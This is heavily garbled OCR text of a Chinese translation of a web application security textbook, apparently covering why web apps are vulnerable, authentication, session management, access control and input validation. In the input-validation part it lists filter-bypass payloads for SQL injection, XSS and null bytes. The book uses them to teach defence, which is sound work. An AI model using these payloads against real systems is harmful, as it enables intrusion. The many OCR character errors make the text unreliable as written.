用 的 应 用 程序 的 要 求 往往 使 开发 团队 忽视 不 明显 的 安全 问题 。 小 型 组 
织 一 般 不 愿 多 花 时 日 评估 一 个 新 的 应 用 程序 。 快 速 渗 透 测 试 通常 只 能 
di 而 往往 会 遗漏 比较 细微 、 需 要 时 间 和 耐心 来 发 
现 的 着 润 。 


6. 技术 上 强 其 所 难 

Web 应 用 程序 使 用 的 许多 核心 技术 出 现 于 万 维 网 早期 阶段 ， 那 时 
的 状况 与 目前 十 分 不 同 。 从 那 以 后 ， 其 功能 已 远 远 超越 最 初 的 设想 ， 
例如 ， 在 许多 基于 AJAX 的 应 用 程序 中 使 用 JavaScript 进 行 数据 传输 。 
随 看 对 Web 应 用 程序 功能 要 求 的 变化 ， 用 于 实现 这 种 功能 的 技术 已 远 
远 落 后 于 其 发 展 要 求 ， 而 开发 人 员 还 是 沿用 原 有 的 技术 来 满足 新 的 需 
， 这 种 做 法 造成 的 安全 漏洞 与 无 法 预料 的 负面 影响 也 就 不 足 
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7. 对 功能 的 需求 不 断 增 强 

在 设计 应 用 程序 时 ， 开 发 人 员 主 要 考虑 是 的 功能 和 可 用 性 。 曾 经 
静态 的 用 户 资源 现在 包含 社区 网 络 功能 ， 人 允许 用 户 上 传 照 片 ， 对 页 面 
进行 “维基 ”风格 的 编辑 。 以 前 ， 应 用 程序 设计 人 员 可 以 仅仅 通过 用 户 
名 和 密码 来 创建 登录 功能 ， 而 现今 的 站 点 则 包含 密码 恢复 、 用 户 名 恢 
复 、 蜜 码 提 示 ， 以 及 在 将 来 访问 时 记 住 用 户 名 和 黎 码 的 选项 。 无 疑 ， 
这 类 站 点 声称 其 能 够 提供 各 种 安全 功能 ， 但 实际 上 ， 这 些 功 能 不 过 是 
增 大 了 该 站 点 的 受 攻击 面 而 已 。 


1.2.4 新 的 安全 边界 


在 Web 应 用 程序 出 现 之 前 ， 主 要 在 网 络 边界 上 抵御 外 部 攻击 。 保 
护 这 个 边界 需要 对 其 提供 的 服务 进行 强化 、 打 补丁 ， 并 在 用 户 访问 之 
间 设 置 防火 墙 。 

Web 应 用 程序 改变 了 这 一 切 。 用 户 要 访问 应 用 程序 ， 边 界 防火 墙 
必须 允许 其 通过 HTTP/HTTPS 连 接 内 部 服务 右 ， 应 用 程序 要 实现 其 功 
能 ， 必 须 允 许 其 连接 服务 絮 以 文 持 后 端 系统 ， 如 数据 库 、 大 型 主机 以 
及 金融 与 后 勤 系 统 。 这 些 系统 通常 处 于 组 织 运营 的 核心 部 分 ， 并 由 几 
层 网 络 级 防御 保护 。 

如 条 Web 应 用 程序 存在 漏洞 ， 那 么 公共 因特网 上 的 攻击 者 只 需 从 
Web 浏 蜗 亏 提 区 专门 设计 的 数据 焉 可 攻破 组 织 的 核心 后 端 系统 。 这 些 
数据 会 像 传 送 至 Web 应 用 程序 的 正常 、 民 性 数据 流 一 样 ， 罕 透 组 织 的 
所 有 网 络 防御 。 

Web 应 用 程序 的 广泛 应 用 使 得 典型 组 织 的 安全 边界 发 生 了 变化 。 
部 分 安全 边界 仍旧 关注 防火 墙 与 防御 主机 ， 但 大 部 分 安全 边 寞 更 加 关 
注 组 织 所 使 用 的 Web 应 用 程序 。Web 应 用 程序 接收 用 户 输入 的 方式 多 
种 多 样 ， 将 这 些 数据 传送 至 敏感 后 端 系统 的 方式 也 多 种 多 样 ， 这 些 都 
古 一 系列 攻击 的 潜在 关口 ， 因 此 必须 在 应 用 程序 内 部 执行 防御 措施 ， 


以 阻挡 这 些 攻击 。 即 使 某 个 Web 应 用 程序 中 的 某 一行 代 码 存在 缺陷 ， 
也 会 使 组 织 的 内 部 系统 易于 遭受 攻击 。 此 外 ， 随 着 “聚合 "应 用 程序 、 
第 三 方 小 部 件 及 其 他 路 域 集 成 技术 的 出 现 ， 服 务 器 端 安全 边界 党 党 会 
跨越 组 织 本 身 的 边界 。 而 且 ， 各 种 组 织 还 盲目 地 信任 外 部 应 用 程序 和 
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TZ 注解 对 一 个 针对 组 织 的 攻击 者 而 言 ， 获 得 网 络 访问 权 或 


在 服务 右上 执行 任意 命令 可 能 并 不 是 他 们 真正 想 要 实现 的 目标 。 大 
多 数 或 者 基本 上 所 有 攻击 首 的 真实 意图 十 执行 一 些 应 用 程序 级 行 
为 ， 如 偷窃 个 人 信息 、 转 账 或 购买 价格 低廉 的 产品 。 而 应 用 程序 层 
面 上 存在 的 安全 问题 对 实现 这 些 目标 有 很 大 帮助 。 

例如 ， 一 名 攻击 着 希望 " 问 入 ”银行 系统 ， 从 用 户 的 账户 中 守 取 


资金 。 在 银行 使 用 Web 应 用 程序 之 前 ， 攻 击 者 可 能 需要 发 现 公 共 服 
务 中 存在 的 漏洞 ， 并 利用 其 进入 银行 的 DMZ， 容 透 限 制 访问 其 内 部 
系统 的 防火 墙 ， 在 网 络 上 搜索 确定 大 型 计算 机 ， 破 译 用 于 访问 它 的 
秘密 协议 ， 然 后 推测 某 些 证 书 以 进行 登录 。 但 是 ， 如 来 银行 使 用 吻 
受 攻击 的 Web 应 用 程序 ， 那 么 攻击 者 可 能 只 需 修改 隐藏 的 HTML 表 
单字 段 中 的 一 个 账号 ， 就 可 以 达到 这 一 目的 。 


Web 应 用 程序 安全 边界 发 生变 化 的 男 一 原因 ， 在 于 用 户 本 身 在 访 
问 一 个 易 受 攻击 的 应 用 程序 时 面临 的 威胁 。 恶意 攻击 者 可 能 会 利用 一 
个 恨 性 但 易 受 攻击 的 Web 应 用 程序 攻击 任何 访问 它 的 用 户 。 如 采用 户 
位 于 企业 内 部 网 络 ， 攻 击 者 可 能 会 控制 用 户 的 浏览 右 ， 并 从 用 户 的 可 
信 位 置 癌 本 地 网 络 发 动 攻击 。 如 果 攻 击 者 心 存 恶 意 ， 他 不 需要 用 户 的 
任何 合作 ， 束 可 以 代表 用 户 执 行 任何 行为 。 随 厦 浏览 右 扩 展 技术 的 兴 
起 ， 各 种 插件 不 断 增 多 ， 客 户 端 受 攻击 面 的 范围 也 明显 变 大 。 

网 络 管理 员 清 楚 如 何 防止 其 用 户 访问 恶意 的 Web 站 点 ， 终 端 用 户 
也 逐渐 意识 到 这 种 威胁 。 但 是 ， 鉴 于 Web 应 用 程序 漏洞 的 本 质 ， 与 一 
个 全 然 恶 意 的 Web 站 点 相 比 ， 易 受 攻 击 的 应 用 程序 至 少 给 用 户 及 其 组 
织带 来 了 一 种 威胁 。 因 此 ， 新 的 安全 边界 要 求 所 有 应 用 程序 的 所 有 者 
承担 保护 其 用 户 的 届 任 ， 使 他 们 免 受 通过 应 用 程序 传送 的 攻击 。 

此 外 ， 和 人们 普遍 采用 电子 邮件 作为 一 种 补充 验证 机 制 ， 安 全 边界 
在 一 定 程 度 上 辣 客 户 端 转移 。 当 前 ， 大 量 应 用 程序 都 包 偏 “ 起 记 密 


码 ” 功 能 ， 攻 击 者 可 以 利用 该 功能 疝 任何 注册 地 址 发 送 账 户 恢 复 电 子 邮 
件 ， 而 无 须 任 何其 他 用 户 特定 的 信息 。 因 此 ， 如 有 果 攻 击 者 攻破 了 用 户 
的 Web 邮 件 账户 ， 束 可 以 轻松 扩大 攻击 范围 ， 并 攻破 受害 用 户 注 册 的 
大 多 数 Web 应 用 程序 账户 。 


1.2.5 Web 应 用 程序 安全 的 未 来 


虽然 经 过 约 10 年 的 广泛 应 用 ， 但 目前 因特网 上 的 Web 应 用 程序 仍 
然 充 满 漏 洞 。 在 了 解 Web 应 用 程序 面临 的 安全 威胁 以 及 如 何 有 效应 对 
这 些 威胁 方面 ， 整 个 行业 仍 未 形成 成 熟 的 意识 。 目 前 几乎 没有 迹象 表 
明 上 述 问 题 能 够 在 不 远 的 将 来 得 到 解决 。 

也 就 是 说 ，Web 应 用 程序 的 安全 形势 并 非 静止 不 变 。 尽 管 SQL 注 
入 等 熟悉 的 传统 漏洞 还 在 不 断 出 现 ， 但 已 不 是 主要 问题 。 而 且 ， 现 有 
的 漏洞 也 变 得 更 难以 发 现 和 利用 。 几 年 前 只 需 使 用 浏览 器 就 能 够 轻易 
探测 与 利用 的 小 漏洞 ， 现 在 需要 花费 大 量 精力 开发 先进 技术 来 发 现 。 

Web 应 用 程序 安全 的 另 一 个 突出 趋势 为 : 攻击 目标 已 由 传统 的 服 
务 器 端 应 用 程序 转向 用 户 应 用 程序 。 后 一 类 攻击 仍然 需要 利用 应 用 程 
序 本 身 的 缺陷 ， 但 这 类 攻击 一 般 要 求 与 其 他 用 户 进行 某 种 形式 的 交 
互 ， 以 达到 破坏 用 户 与 易 受 攻击 的 应 用 程序 之 间 交 易 的 目的 。 其 他 软 
件 安全 领域 也 同样 存在 这 种 趋势 。 随 着 安全 威胁 意识 的 增强 ， 服 务 妖 
端 存在 的 缺陷 首先 应 为 人 们 所 理解 并 得 到 解决 ， 从 而 可 以 在 进一步 的 
研究 过 程 中 将 注意 力 集 中 在 客户 端 。 本 书 描述 的 全 部 攻击 类 型 中 ， 那 
些 针对 其 他 用 户 的 攻击 是 发 展 最 快 的 攻击 类 型 ， 也 是 当前 许多 研究 的 
焦点 所 在 。 

技术 领域 的 各 种 最 新 趋势 在 一 定 程度 上 改变 了 Web 应 用 程序 的 安 
全 状态 。 一 些 极 具 误 导 性 的 热门 词汇 使 这 些 趋势 深入 人 心 ， 下 面 是 一 
些 最 热门 的 词汇 。 

口 Web 2.0。 这 一 术语 指 更 大 范围 地 采用 实现 用 户 生成 内 容 和 信息 
共享 的 功能 ， 以 及 采用 各 种 广泛 支持 这 一 功能 的 技术 ， 包 括 异 步 HITP 
请 求 和 跨 域 集成 。 

口 云 计算 。 这 一 术语 指 更 多 地 通过 外 部 服务 提供 商 来 实施 技术 栈 
的 各 个 部 分 ， 包 括 应 用 程序 软件 、 应 用 程序 平台 、Web 服 务 器 软件 、 
数据 库 和 硬件 。 它 也 指 在 托管 环境 中 大 量 采用 虚拟 化 技术 。 

和 技术 领域 的 大 多 数 变 革 一 样 ， 这 些 趋势 也 催生 了 一 些 新 型 攻 
击 ， 并 导致 现 有 攻击 产生 变 体 。 虽 然 这 些 趋势 受到 人 们 的 大 肆 妃 捧 ， 
但 鉴于 其 导致 的 各 种 问题 ， 它 们 并 不 像 人 们 最 初 认 为 的 那样 会 带 来 颠 


履 性 的 改变 。 我 们 将 在 本 书 的 相应 部 分 讨论 与 这 些 及 其 他 最 新 趋势 有 
天 的 安全 问题 。 

尽管 Web 应 用 程序 发 生 了 所 有 这 些 改变 ， 一 些 典型 漏洞 并 未 表现 
出 任何 减少 的 迹象 。 它 们 继续 出 现 ， 方 式 与 Web 技 术 发 展 初期 大 致 相 
同 。 这 些 漏 洞 包括 业务 逻辑 缺陷、 未 能 正确 应 用 访问 控制 以 及 其 他 设 
计 问 题 。 即 使 在 应 用 程序 组 件 紧密 集成 及 “一 切 卉 服务 ”的 时 代 ， 这 些 
问题 仍然 会 广泛 存在 。 


1.3 ”小结 


大 约 十 几 年 的 时 间 ， 万 维 网 已 由 纯粹 的 静态 信息 仓库 发 展 为 功能 
强大 的 应 用 程序 ， 能 够 处 理 敏感 的 数据 并 执行 用 于 输出 实际 结 打 的 高 
度 功 能 化 的 应 用 程序 。 在 这 个 发 展 过 程 中 ， 多 种 因素 造成 了 当前 绝 大 
多 数 Web 应 用 程序 所 面临 的 安全 保护 不 足 的 状况 。 

多 数 应 用 程序 都 面临 一 个 核心 安全 问题 ， 即 用 户 可 提交 任意 输 
入 。 用 户 与 应 用 程序 交互 的 每 一 个 方面 都 可 能 是 恶意 的 ， 而 且 在 未 能 
证 明 其 并 无 恶意 之 前 应 该 被 认定 为 是 恶意 的 。 如 果 这 个 问题 处 理 不 
当 ， 应 用 程序 束 有 可 能 受到 各 种 形式 的 攻击 。 

当前 Web 应 用 程序 安全 状况 的 所 有 证 据 表 明 ， 这 个 问题 尚未 得 到 
很 好 的 解决 ， 而 且 不 管 是 对 部 署 Web 应 用 程序 的 组 织 还 是 对 访问 它们 
的 用 户 而 言 ， 针 对 Web 应 用 程序 的 攻击 都 是 一 个 严重 的 威胁 。 


Web 应 用 程序 的 基本 安全 问题 (所 有 用 户 输入 都 不 可 信 ) 致使 应 
用 程序 实施 大 量 安全 机 制 来 抵御 攻击 。 尽 管 其 设计 细 市 与 执行 效率 可 
能 千差万别 ， 但 几乎 所 有 应 用 程序 采用 的 安全 机 制 在 概念 上 都 具有 相 
似 性 。 

Web 应 用 程序 采用 的 防御 机 制 由 以 下 几 个 核心 因素 构成 。 
口 处 理 用 户 访问 应 用 程序 的 数据 与 功能 ， 防 止 用 户 获 得 未 授权 访 


问 。 
口 处 理 用 户 对 应 用 程序 功能 的 输入 ， 防 止 错误 输入 造成 不 良 行 


为 。 
口 防范 攻击 者 ， 确 保 应 用 程序 在 成 为 直接 攻击 目标 时 能 够 正 芝 运 
转 ， 并 采取 适当 的 防御 与 攻击 措施 挫败 攻击 者 。 
口 管理 应 用 程序 本 映 ， 帮 助 管理 员 监 控 其 行为 ， 配置 其 功能 。 
鉴于 它们 在 解决 核心 安全 问题 过 程 中 所 发 挥 的 重要 作用 ， 一 个 典 
型 应 用 程序 的 绝 大 多 数 受 攻击 面 册 也 由 这 些 机 制 构 成 。 知己知彼 是 战 
争 的 首要 法 则 ， 那 么 防御 攻击 者 同 应 用 程序 发 动 有 效 攻击 的 重要 前 所 
古 彻 研 了 解 这 些 机 制 。 无 论语 者 在 渗透 测试 方面 是 否 有 经 验 ， 痢 应 花 
时 间 了 解 这 些 核心 机 制 在 遇 到 的 每 一 种 应 用 程序 中 的 工作 原理 ， 并 确 
定 使 其 易于 受到 攻击 的 弱点 。 


2.1 理 Palle 


几乎 任何 应 用 程序 都 必须 满足 一 个 中 心安 全 要 求 ， 即 处 理 用 户 访 
问 其 数据 与 功能 。 在 通常 情况 下 ， 用 户 一 般 分 为 儿 种 类 型 ， 如 匿名 用 
尸 、 正 第 通过 验证 的 用 户 和 管理 用 户 。 而 且 ， 许 多 情况 下 ， 不 同 的 用 
户 只 允许 访问 不 同 的 数据 ， 例 如 ，Web 邮 件 应 用 程序 的 用 户 只 能 阅读 
目 己 的 而 非 他 人 的 电子 邮件 。 

大 多 数 Web 应 用 程序 使 用 三 层 相互 关联 的 安全 机 制 处 理 用 户 访 
[A]: 


口号 份 难 证 ; 

口 会 话 管理 ; 

口 访 问 控制 。 

上 述 每 一 个 机 制 都 是 应 用 程序 受 攻击 面 的 一 个 关键 部 分 ， 对 于 应 
用 程序 的 总 体 安 全 状况 极其 重要 。 由 于 这 些 机 制 相 互 依赖 ， 因 此 根本 
不 能 提供 强大 的 总 体 安全 保护 ， 任 何 一 个 部 分 存在 缺陷 都 可 能 使 攻击 
者 目 由 访问 应 用 程序 的 功能 与 数据 。 


2.1.1 验证 


从 理论 上 说 ,身份 验证 机 制 是 应 用 程序 处 理 用 户 访问 的 最 基本 机 
制 。 验 证 用 户 是 指 确定 用 户 的 真实 对 份 。 如 有 果 不 采 用 这 个 机 制 ， 应 用 
程序 会 将 所 有 用 户 作 为 匿名 用 户 对 等， 这 是 最 低 一 级 的 信任 。 
今天 ， 绝 大 多 数 Web 应 用 程序 都 采用 传统 的 喘 份 验证 模型 ， 即 要 
求 用 户 提 交 用 户 名 与 密码 ， 再 由 应 用 程序 对 其 进行 核实 ， 确 认 其 合法 
性 。 一 种 典型 的 登录 功能 如 图 2-1 所 示 。 在 安全 性 至 关 重 要 的 应 用 程序 
《如 电子 银行 使 用 的 应 用 程序 ) 中， 通常 使 用 其 他 证 书 与 多 阶段 登录 
过 程 强 化 这 个 基本 模型 。 在 安全 要 求 更 高 的 情况 下 ， 可 能 需要 基于 客 
户 端 证 书 、 智 能 卡 或 质询 -响应 令 牌 《challenge-response token) 使 用 其 
他 吴 份 验证 模型 。 除 核心 登录 过 程 外 ， 喘 份 难 证 机 制 往 往 还 要 采取 一 
系列 其 他 支持 功能 ， 如 自我 注册 、 账 户 恢复 和 密码 修改 工具 。 


Log in 


Please log in below by completing the details requested, then select 'Log In’ 


For security reasons, you have a limited number of attempts to provide the correct information. Ifyou do 
not provide the correct information, access to your Intelligent Finance plan will be suspended. !fthis 
happens, please call 0845 609 4343 and we will send you anew Plan Security Code You will then be 
able to access your olan by following the reactivation process. 


Ifyou are not sure about your login detalls or require help, please call us 


Online Username | This must be at least 6 characters jong and 


can have jolters and/or numbers, but no 
Spaces. 


Online Password | This must be at feast 6 characters long and 


must have Doth fetiers and numbers, but 
no spaces 


图 2-1 一 种 典型 的 登录 功能 


尽管 表面 看 似 简单 ， 但 无 论 是 设计 方面 还 是 执行 方面 ， 身 份 验 证 
机 制 都 存在 大 量 缺 陷 。 第 见 的 问题 可 能 使 得 攻击 者 能 够 确定 其 他 用 户 
的 用 户 名 、 推 测 出 他 们 的 密码 ， 或 者 利用 其 逻辑 缺陷 完全 避 开 登 孙 功 
能 。 攻 击 Web 应 用 程序 时 ， 渗 透 测试 员 应 当 投 入 大 量 精力 ， 攻 击 应 用 
程序 采用 的 各 种 与 映 份 验 证 有 关 的 功能 。 出 人 意料 的 是 ， 这 种 功能 中 
存在 的 缺陷 往往 允许 攻击 者 非法 访问 敏感 数据 与 功能 。 


2.1.2 ”全 话 管理 


处 理 用 户 访问 的 下 一 项 逻辑 任务 征管 理 通过 验证 用 户 的 会 话 。 成 
功 登 孙 应 用 程序 后 ， 用 户 会 访问 各 种 页 面 与 功能 ， 从 浏览 右 提 出 一 系 
列 HTTP 请 求 。 与 此 同时 ， 应 用 程序 还 会 收 到 各 类 用 户 (包括 通过 验证 
的 用 户 与 匿名 用 户 ) 发 出 的 无 数 请 求 。 为 实施 有 效 的 访问 控制 ， 应 用 
程序 需要 识别 并 处 理 每 一 名 用 户 提交 的 各 种 请 求 。 

为 满足 以 上 要 求 ， 几 乎 所 有 的 Web 应 用 程序 都 为 每 一 位 用 户 建 立 
一 个 会 话 ， 并 同 用 户 发 布 一 个 标识 会 话 的 令 脾 。 会 话 本 身 是 一 组 保存 
在 服务 器 上 的 数据 结构 ， 用 于 追踪 用 户 与 应 用 程序 的 交互 状态 。 令 牌 
征 一 个 唯一 的 字符 串 ， 应 用 程序 将 其 映射 到 会 话 中 。 当 用 户 收 到 一 个 
令 牌 时 ， 浏 览 器 会 在 随后 的 HITP 请 求 中 将 它 返 回 给 服务 器 ， 帮 助 应 用 
程序 将 请 求 与 该 用 户 联 系 起 来 。 虽 然 许 多 应 用 程序 使 用 隐藏 表单 字段 


(hidden form field) 或 URL 查 询 字 符 串 (query string) 传送 会 话 令 牌 

(session token) ， 但 HTTP cookie 才 是 实现 这 一 日 的 的 常规 方法 。 如 
末 用 户 在 一 段 时间 内 没有 发 出 请 求 ， 会 话 将 会 目 动 终止 ， 如 图 2-2 所 
ZN O 


Sorry -for your own protection we have had to log you out of your online account 
because you did not use the service for more than 10 minutes. To re-enter your account, 
please log in again 


Would you like to log in now? 


图 2-2 ”一 个 实施 会 话 超时 的 应 用 程 月 


忠 受 攻击 面 而 言 ， 会 话 管 理 机 制 的 有 效 性 基本 上 取决 于 其 令 脾 的 
安全 性 ， 绝 大 多 数 针 对 它 的 攻击 部 企 图 攻破 其 他 用 户 的 令 牌 。 如 来 令 
牌 被 攻破 ， 攻 击 者 束 可 以 伪 流 成 被 攻破 的 用 户 ， 像 已 经 通过 验证 的 用 
户 一 样 使 用 应 用 程序 。 令 牌 生成 过 程 中 存在 的 缺陷 是 主要 的 漏洞 来 
源 ， 使 攻击 者 能 够 推测 出 发 布 给 其 他 用 户 的 令 牌 ; 随后， 攻击 者 再 利 
用 令 牌 中 的 缺陷 截获 其 他 用 户 的 令 牌 。 

少数 应 用 程序 不 同 用 户 发 布 会 话 令 牌 ， 而 是 通过 其 他 方法 在 多 个 
请 求 中 重复 确认 用 户 身 份 。 如 果 使 用 HTTP 的 内 置身 份 验证 机 制 ， 那 么 
浏览 絮 会 目 动 在 每 个 请 求 中 重复 提交 用 户 证 书 ， 帮 助 应 用 程序 直接 通 
过 这 些 请 求 识别 用 户 。 在 其 他 情况 下 ， 应 用 程序 会 将 状态 信息 保存 在 
Oe AV 
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2.1.3 ”访问 控制 


处 理 用 户 访问 的 最 后 一 个 逻 错 步骤 是 做 出 并 实施 正确 的 决策 ， 决 
定 允 许 或 拒绝 每 一 个 请 求 。 如 果 前 面 的 机 制 运作 正常 ， 应 用 程序 即 可 
从 收 到 的 每 一 个 请 求 确 认 用 户 的 身份 。 在 此 基础 上 ， 应 用 程序 需要 决 
定 是 否 授权 用 户 执行 其 所 请 求 的 操作 或 访问 相关 数据 ( 见 图 2-3) 。 


liome” A 


Access Denied [403] 


We're sorry... 


You are not authorized to access this page. 


e Login to the cite 

+ If you typed the page ur, check the speling. 

e Click your browser's beck vullon and Ly anolher link. 

+ Consider telling us about the broken link that led you tc this page. 


We apclogize for the inconvenience, and hope we'l see you again soon. 


图 2-3 ”应 用 程序 正 实施 访问 控制 


访问 控制 机 制 一 般 需 要 实现 茶 种 精心 设计 的 逻辑 ， 并 分 别 考 虑 各 
种 相关 应 用 程序 领域 与 不 同类 型 的 功能 。 应 用 程序 可 文 持 无 数 不 同 的 
用 户 角色 ， 每 种 角色 都 拥有 特定 的 权限 ， 每 名 用 户 只 允许 访问 应 用 程 
序 中 的 部 分 数据 。 应 用 程序 可 能 需要 根据 用 户 的 映 份 ， 通 过 特殊 功能 
实现 交易 限制 与 其 他 检查 。 

由 于 典型 访问 控制 的 要 求 相当 复杂 ， 因 此 这 种 机 制 中 一 般 存 在 大 
量 的 安全 漏洞 ， 使 得 攻击 者 能 够 未 授权 访问 应 用 程序 的 数据 与 功能 。 
开发 者 经 常会 对 用 户 与 应 用 程序 的 交互 方式 做 出 错误 假设 ， 并 种 帝 会 
有 所 玻 忽 ， 在 某 些 应 用 程序 功能 中 省 略 访问 控制 检查 。 探 查 这 些 漏 洞 
征 一 件 费 力 的 工作 ， 因 为 需要 对 每 一 项 功能 重复 进行 相同 的 检查 。 然 
而 ， 因 为 访问 控制 机 制 中 存在 大 量 漏 润 ， 所 以 在 测试 Web 应 用 程序 时 
付出 这 样 的 努力 总 十 值 得 的 。 第 8 半 我 们 会 讲述 在 执行 闫 格 的 访问 控制 
试 测 时 ， 如 何 将 某 些 操作 目 动 化 。 


2.2 理 入 


回想 一 下 第 1 章 描 述 的 基本 安全 问题 : 所 有 用 户 输入 都 不 可 信 。 大 
量 针 对 Web 应 用 程序 的 不 同 攻击 都 与 提交 错误 输入 有 关 ， 攻 击 者 专门 
设计 这 类 输入 ， 以 引发 应 用 程序 设计 者 无 法 预料 的 行为 。 因 此 ， 能 够 
安全 处 理 用 户 输入 是 对 应 用 程序 安全 防御 的 一 个 关键 要 求 。 

应 用 程序 的 每 一 项 功能 以 及 几乎 每 一 种 常用 的 技术 都 可 能 出 现 输 
入 方面 的 漏洞 。 通 常 来 说 ， 输 入 确认 (input validation) 是 防御 这 些 攻 
击 的 必要 手段 。 然 而 ， 任 何 一 种 保护 机 制 都 不 是 万 能 的 ， 防 御 恶 意 输 
入 也 并 非 如 听 起 来 那样 简单 。 


2.2.1 A 


典型 的 web 应 用 程序 以 各 种 不 同 的 形式 处 理 用 户 提交 的 数据 。 一 
些 类 型 的 输入 确认 可 能 并 不 适用 或 能 够 确认 所 有 这 些 形式 的 输入 。 通 
常 由 用 户 注 册 功 能 执行 的 输入 确认 如 图 2-4 所 示 。 


First Name 
la Wust contain at least 4 characters 


Last Name 


[a Wust contain at least 4 characters 


Cmail 


fa Please provide a valid email address 


Phone number 
la Must contain only numbers 


图 2-4 ”应 用 程序 正 执行 输入 确认 


在 许多 情况 下 ， 应 用 程序 可 能 会 对 一 些 特殊 的 输入 实行 非常 严格 
的 确认 检查 。 例 如 ， 提 交 给 登录 功能 的 用 户 名 的 最 大 长 度 为 8 个 字符 ， 
且 只 能 包 人 字母 。 


在 其 他 情况 下 ， 应 用 程序 必须 接受 更 广泛 的 输入 。 例 如 ， 提 交 给 
个 人 信息 页 面 的 地 址 字段 可 合法 包含 字母 、 数 字 、 衬 格 、 连 字符 、 抽 
号 与 其 他 字符 。 但 是 仍然 可 以 对 这 个 字段 实施 有 效 的 限制 。 例 如 ， 提 
交 的 数据 不 得 超过 某 个 适当 的 长 度 限制 《如 50 个 字符 ) ， 并 不 得 包含 
任何 HTML 标 记 (HTMLmarkup) 。 

有 些 时 候 ， 应 用 程序 可 能 需要 接受 用 户 提交 的 任意 输入 。 例 如 ， 
一 名 博客 应 用 程序 用 户 可 以 建立 一 个 主题 为 “< 攻击 Web 应 用 程序 ”的 博 
客 。 博 客 文章 和 评论 可 合法 包含 所 讨论 的 明确 攻击 字符 串 。 应 用 程序 
可 能 需要 将 这 些 输入 保存 在 数据 库 中 ， 写 入 磁盘 ， 并 以 安全 的 方式 辐 
用 户 显 示 。 不 能 仅仅 因为 输入 看 似 恶意 (但 并 未 显著 破坏 应 用 程序 对 
一 些 用 户 的 价值 ) ， 就 拒绝 接受 该 输入 。 

除了 用 户 通过 浏览 器 界面 提交 的 各 种 输入 外 ， 一 个 典型 的 应 用 程 
序 还 会 收 到 大 量 数据 ， 它 们 在 服务 器 上 生成 ， 并 被 传送 给 客户 端 ， 以 
便 客户 端 能 够 在 随后 的 请 求 中 将 其 返回 给 服务 器 。 这 些 数据 包括 
cookie 和 隐藏 表单 字段 ， 普 通 应 用 程序 用 户 虽 然 无 法 浏览 这 些 数据 
项 ， 但 攻击 者 能 够 查看 并 修改 它们 。 在 这 些 情况 下 ， 应 用 程序 通常 可 
对 接收 到 的 数据 执行 非常 特殊 的 确认 操作 。 例 如 ， 一 个 参数 可 能 必须 
包含 一 个 特殊 的 已 知 值 (如 说 明 用 户 首选 语言 的 cookie) ， 或 者 为 某 
种 特殊 的 格式 (如 一 个 顾客 的 身份 证 号 码 )。 而 且 ， 如 果 应 用 程序 发 现 
服务 器 上 生成 的 数据 遭 到 修改 ， 并 且 使 用 标准 浏览 器 的 普通 用 户 根本 
不 可 能 进行 此 类 修改 ， 那 么 极 有 可 能 是 该 用 户 正 企图 探查 应 用 程序 的 
漏洞 。 在 这 些 情 况 下 ， 应 用 程序 应 拒绝 该 用 户 提交 的 请 求 ， 并 将 事件 
记 入 日 志文 件 中 ， 以 便 随 后 进行 调查 〈 请 参阅 2.3 节 了 解 相 关内 容 ) 。 


2.2.2 ”输入 处 理 方 法 


通 间 可 采用 各 种 方法 来 处 理 用 户 输入 。 不 同 的 方法 一 般 适 用 于 不 
同 的 情形 与 不 同类 型 的 输入 ， 有 时 最 好 结合 采用 几 种 方法 。 

1.“ 拒 绝 已 知 的 不 良 输入 ” 

这 种 方法 一 般 使 用 一 个 黑 名 单 ， 其 中 包含 一 组 在 攻击 中 使 用 的 已 
知 的 字面 量子 符 串 或 模式 。 确 认 机 制 阻 止 任何 与 黑 名 单 匹配 的 数据 ， 
并 接受 其 他 数据 。 

一 般 来 说 ， 因 为 两 方面 的 主要 原因 ， 这 种 方法 是 确认 用 户 输入 歼 
率 最 低 的 方法 。 首 先 ， 攻 击 者 可 通过 一 系列 输入 对 典型 Web 应 用 程序 
中 存在 的 漏洞 加 以 利用 ， 这 些 输入 可 通过 各 种 方式 进行 编码 ， 或 者 表 
现 为 不 同 的 形式 。 除 非 在 最 简单 的 情况 下 ， 否 则 ， 黑 名单 可 能 会 忽略 


某 些 可 用 于 攻击 应 用 程序 的 输入 模式 。 其 次 ， 攻 击 技术 处 在 不 断 发 展 
的 过 程 之 中 。 当 前 的 墨 名 单 无 法 防止 利用 现 有 漏洞 的 新 型 方法 。 

通过 对 被 阻止 的 输入 稍 做 调整 ， 即 可 轻易 避 开 许多 基于 墨 名单 的 
过 滤 。 例 如 : 

口 如 果 SELECT 被 阻止 ， 则 答 试 SeLeCt 

口 如 果 or 1 = 1 -- 被 阻止 ， 则 壬 斌 or 2 = 2 --; 

口 如 果 alert ('xss') 被 阻止 ， 则 莹 试 prompt ('xss') ° 

在 其 他 情况 下 ， 通 过 在 表达 式 之 间 使 用 非 标准 字符 破坏 应 用 程序 
执行 的 令 脾 ， 可 以 避 开 旨 在 阻止 特定 关键 字 的 过 滤 。 例 如 : 


SELECT/ * foo*/username, password/ *foo*/FROM/*foo*/users 


<img%O09onerror=alert({1) src=a> 


最 后 ， 各 种 基于 墨 名 单 的 过 滤 ， 竺 别 是 那些 由 Web 应 用 程序 防火 
墙 执行 的 过 减 ， 都 易 受 空 字 节 攻 击 。 由 于 在 托管 和 非 托 管 情 况 下 处 理 
字符 串 的 方式 各 不 相同 ， 在 被 阻止 的 表达 式 之 前 的 任何 位 置 插入 空 字 
人 并 因此 无 法 确定 表达 式 。 例 

H: 


$00<script>alert (1}</script> 


我 们 将 在 第 18 章 介绍 各 种 攻击 Web 应 用 程序 防火 墙 的 其 他 技巧 。 


T 注解 对 空 字 节 的 处 理 方式 加 以 利用 的 攻击 存在 于 Web 应 用 
程序 安全 的 各 个 领域 。 在 空 字 节 被 当做 字符 串 分 隔 符 的 情况 下 ， 空 


字 市 可 用 于 终止 文件 名 或 对 某 个 后 端 组 件 的 查询 。 在 接受 并 忽略 空 
字 节 的 情况 下 (例如 ， 在 某 些 浏览 器 的 HTML 代 码 中 ) ， 可 以 在 被 
阻止 的 表达 式 中 插入 任意 空 字 人 ， 以 避 开 基于 墨 名 单 的 过 滤 。 这 类 
攻击 将 在 后 面 几 章 详 细 介 绍 。 


2. “接受 已 知 的 正常 输入 ” 
这 种 方法 使 用 一 个 白 名 单 ， 其 中 包含 仅 与 民 性 输入 匹配 的 一 组 子 
量 字 符 串 、 模 式 或 一 组 标准 。 确 认 机 制 接受 任何 与 白 名 单 匹 配 的 数 
据 ， 并 阻止 其 他 数据 。 例 如 ， 在 数据 库 中 查询 所 需 的 产品 代码 时 ， 应 
